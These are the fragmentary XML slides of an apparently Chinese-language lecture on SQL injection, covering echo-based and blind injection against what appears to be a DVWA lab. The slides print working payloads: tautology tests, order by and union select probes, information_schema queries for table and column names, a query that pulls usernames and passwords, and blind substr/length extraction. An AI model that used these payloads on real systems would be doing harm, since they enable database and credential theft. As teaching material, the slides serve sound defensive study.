              </a:rPr>
              <a:t> =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$id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'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86800" y="5499603"/>
            <a:ext cx="173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$id=</a:t>
            </a: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1’ or ‘1’ =‘1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200" y="583009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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> =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‘</a:t>
            </a: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1’ or ‘1’=‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'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86800" y="549806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$id=</a:t>
            </a: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9200" y="583009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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> =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‘</a:t>
            </a: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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0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常见的注入测试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内容占位符 5" descr="poc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209800"/>
            <a:ext cx="89820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gray">
          <a:xfrm>
            <a:off x="914400" y="1219200"/>
            <a:ext cx="10287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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>注入其实就是将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>语句插入到用户提交的可控参数中，改变原有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>语义结构，从而执行攻击者所预期的结果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26774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注入攻击的分类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根据前台数据是否回显区分</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>回显注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器将查询结果返回到页面中进行显示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例如查询某篇新闻、查询某个用户信息等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盲注</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器执行数据库操作，但是不会将查询结果返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例如用户注册，只是提示用户名是否被注册，不会返回数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>相比“回显注入”，利用难度大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回显注入攻击的流程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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统使用的脚本语言，寻找注入点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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统的数据类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断数据库中表及相应字段的结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>构造注入语句，得到表中数据内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查找网站管理员后台，用得到的管理员帐号和密码登录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结合其他漏洞，上传后门（例如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）并持续连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进一步提权，得到服务器的系统权限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5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手工注入的思路 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>寻找注入点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058400" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虽然有自动化注入工具，但从手动注入开始了解，才能掌握</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入的原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>经典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1=1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>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1=2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恒真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/>
                </a:solidFill>
              </a:rPr>
              <a:t>恒假</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>测试法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>http://www.test.com/showdetail.php?id=49</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>http://www.test.com/showdetail.php?id=49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’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and‘1’=‘1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/>
              <a:t>http://www.test.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>showdetail.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>=49</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’and‘1’=‘2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>观察：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>页面有没有变化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>页面中少了部分内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>错误回显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410200" y="4478529"/>
            <a:ext cx="3448380" cy="1317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+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>跳转到默认界面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="280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+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>直接关闭连接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7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手工注入的思路</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>–2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过回显位确定字段数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回显位指的是数据库查询结果在前端界面中显示出来的未知，也就是查询结果返回的是数据库中的哪列。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令猜测列数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xxx.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1’order by 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>若输入的数据大于列数，则报错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 union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>尝试显示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xxx.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1’ and ‘1’=‘2’ union select 1,2,3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6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手工注入的思路</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>–3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 注入并获取数据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287000" cy="3352800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>接下来尝试注入获取表、字段、数据的信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL 5.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>之后的版本中，内置了一个数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，用于存储当前数据库中的所有库名、表名等信息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92596592"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1701800" y="2683933"/>
          <a:ext cx="8483600" cy="377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9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判断数据库类型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431925"/>
            <a:ext cx="3175000" cy="3673475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>报错信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>猜测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91" y="1276391"/>
            <a:ext cx="9144209" cy="52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手工注入的思路</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>–3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 注入并获取数据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066800"/>
            <a:ext cx="10287000" cy="53340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可以直接查询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库来获得目标信息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例如，在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猜测表名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1' union select 1,group_concat(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=database()#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猜列名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altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1' union select 1,group_concat(column_name) from information_schema.columns where table_name ='users'#</a:t>
            </a:r>
          </a:p>
          <a:p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猜用户密码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1' union select user, password from users #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569C91-A38E-49E9-A107-12891443843D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="3581400"/>
            <a:ext cx="41910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Group_concat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把属于一个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group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的元素整合在一行里，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>将多个字符串连接成一个字符串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086F65-6D57-4A4B-AD84-F065040F4B51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="3048000"/>
            <a:ext cx="4126454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获取所有表结构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(TABLES)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT  *  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 TABLE_SCHEMA='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>';  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注入攻击的原理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注入攻击的分类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回显注入攻击的流程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盲注攻击的流程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常见防护手段</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8285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注入攻击简介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1800" cy="5105400"/>
          </a:xfrm>
        </p:spPr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注入是指攻击者通过把恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令插入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表单的插入域或页面请求的查询字符串中，并且插入的恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令会导致原有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句作用发生改变，从而欺骗服务器执行恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令的一种攻击方式。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注入攻击已经多年蝉联</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>高危漏洞的前三名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以实现任意数据查询</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如管理员的密码、用户高价值数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>严重时会发生“脱库”的高危行为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盲注攻击的流程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难点在于没有回显</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>整体思路与标准注入过程相同，只是额外加入判断方式，使得返回结果只有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36270"/>
            <a:ext cx="7239000" cy="37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1 and 1=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>，返回成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回结果只能判定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 )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>，说明没有执行后面语句，不是数字型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133600"/>
            <a:ext cx="6267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1’ and ‘1’ =‘1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>成功</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/>
              <a:t>1’ and ‘1’ ='2  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>失败</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>说明是字符型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362200"/>
            <a:ext cx="57626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猜解数据库名字长度 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/>
              <a:t>1’and length(database())=1 #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05000"/>
            <a:ext cx="6057900" cy="3848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F2593E-EC5B-4CD7-957B-A34DE16F14FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9144000" y="2362200"/>
            <a:ext cx="2057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/>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的长度，以字节为单位。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06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4343400" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>猜解数据库的名称，查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>码对照表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/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1’and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(database(),1,1))&gt;97 #</a:t>
            </a:r>
            <a:b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两个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分别代表起始位和长度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1' and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(database(),1,1))&lt;122 #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，说明数据库名称在小写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个字母内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2052" name="Picture 4" descr="https://img-blog.csdnimg.cn/20190806164930724.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1MDcwMTE4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47345"/>
            <a:ext cx="527685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94BD60-72BA-4D47-AC88-F8D858DC3517}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="52754"/>
            <a:ext cx="34290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str,pos,len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>);//str: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：起始位置，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：截断长度</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246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不断尝试数据名称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一般用折半法查找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第一位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(database(),1,1))&lt;110 #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也正确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缩减范围，最后确定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(database(),1,1))=100 #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第二位就把起始位改为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，和第一个一样的方法最后确定为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(database(),2,1))=118 # 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第三位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(database(),3,1))=119 #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第四位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(database(),4,1))=97 #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最终数据库名称为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2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猜解数据中的表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>首先猜解库中有几个表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1’ and (select count(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’)=1 #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错误，说明不是一个，然后一个个往上试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1’ and (select count(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’)=2 #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正确，说明有两个表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0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猜解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第一个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表表名长度</a:t>
            </a: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length(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’ limit 0,1),1))=1 #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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错误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length(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’ limit 0,1),1))=9 #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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试到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试成功，说明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第一个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表名长度为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0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896600" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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猜解表的名称第一个表第一位数方法和猜解数据库名称方法一样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dvwa’limit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0,1),1))&gt;97 #</a:t>
            </a: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dvwa’limit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0,1),1))&lt;122 #</a:t>
            </a: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dvwa’limit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0,1),1))=103 # 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最终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成功，为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62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猜解数据 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>猜解有几列 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>猜解列名称</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>猜解用户名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>猜解用户名长度 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>猜解用户名称</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>猜解密码 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
